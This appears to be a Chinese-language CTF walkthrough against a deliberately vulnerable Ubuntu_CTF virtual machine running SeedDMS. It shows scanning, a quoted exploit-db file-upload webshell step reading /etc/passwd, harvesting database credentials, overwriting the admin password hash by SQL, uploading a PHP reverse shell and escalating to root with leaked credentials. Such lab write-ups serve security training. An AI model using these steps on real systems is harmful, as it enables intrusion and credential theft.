ailx10
网络安全优秀回答者
网络安全硕士
去咨询
1、开机(Ubuntu_CTF)开机
2、主机发现(192.168.199.109)主机发现
3、端口扫描(80、3306)端口扫描
4、web首页Most hackers are young because young people tend to be adaptable. As long as you remain adaptable, you can always be a good hacker."-Emmanuel Goldstein大多数黑客都很年轻,因为年轻人往往适应能力强。 只要你保持适应能力,你就永远可以成为一名优秀的黑客。——伊曼纽尔·戈德斯坦web首页
5、查看源代码,在js注释中找到线索查看源代码
6、访问页面访问页面
7、查找漏洞searchsploit SeedDMS查找漏洞
8、查看漏洞简介发现需要登录之后,才能利用文件上传漏洞
─# find / -name "47022.txt" 2>/dev/null/usr/share/exploitdb/exploits/php/webapps/47022.txt Step 1: Login to the application and under any folder add a document.登录到应用程序并在任何文件夹下添加一个文档。Step 2: Choose the document as a simple php backdoor file or any backdoor/webshell could be used.选择文档作为简单的 php 后门文件,或者可以使用任何后门/webshell。Step 3: Now after uploading the file check the document id corresponding to the document.现在上传文件后检查与文档对应的文档ID。Step 4: Now go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser.现在转到 example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd 以在浏览器中获取命令响应。Note: Here "data" and "1048576" are default folders where the uploaded files are getting saved. 注意:这里的“data”和“1048576”是保存上传文件的默认文件夹。9、在conf/settings.xml中发现mysql的用户名密码dbDatabase="seeddms" dbUser="seeddms" dbPass="seeddms"conf 目录
10、登录mysql,查看web的用户名密码,发现登录不成功use seeddms;show tables;select * from users;+-------------+---------------------+--------------------+-----------------+| Employee_id | Employee_first_name | Employee_last_name | Employee_passwd |+-------------+---------------------+--------------------+-----------------+| 1 | saket | saurav | Saket@#$1337 |+-------------+---------------------+--------------------+-----------------+查看users表
11、继续查看 tblUsers 表,找到admin的pwdadmin密码
12、在线破解md5[1],快如闪电(undefined应该是解密失败,尴尬),发现还是无法登录undefined破解md5
13、篡改md5值└─# echo -n 'ailx10'|md5sum|cut -d ' ' -f183b70504e0d8742dd5b66e6962eb8a35update tblUsers set pwd="83b70504e0d8742dd5b66e6962eb8a35" where login="admin";select login,pwd from tblUsers;篡改md5
14、继续登录密码正确
15、上传反弹shell使用kali自带的php反弹shell脚本,使用kali自带的php反弹shell脚本,使用kali自带的php反弹shell脚本
└─# find / -name "php-reverse-shell.php" 2>/dev/null /usr/share/laudanum/php/php-reverse-shell.php/usr/share/laudanum/wordpress/templates/php-reverse-shell.php/tmp/mozilla_ailx100/php-reverse-shell.phpkali自带的php反弹shell脚本
修改IP地址和端口
上传成功
16、本地监听,再点击web页面的反弹shell反弹成功
最后文件名会被修改成 1.php
17、切换用户,使用users表中的用户名密码,sudo获得root权限select * from users;+-------------+---------------------+--------------------+-----------------+| Employee_id | Employee_first_name | Employee_last_name | Employee_passwd |+-------------+---------------------+--------------------+-----------------+| 1 | saket | saurav | Saket@#$1337 |+-------------+---------------------+--------------------+-----------------+获得root权限
到此,实验完成~
参考^md5破解 https://pmd5.com/发布于 2022-08-27 12:44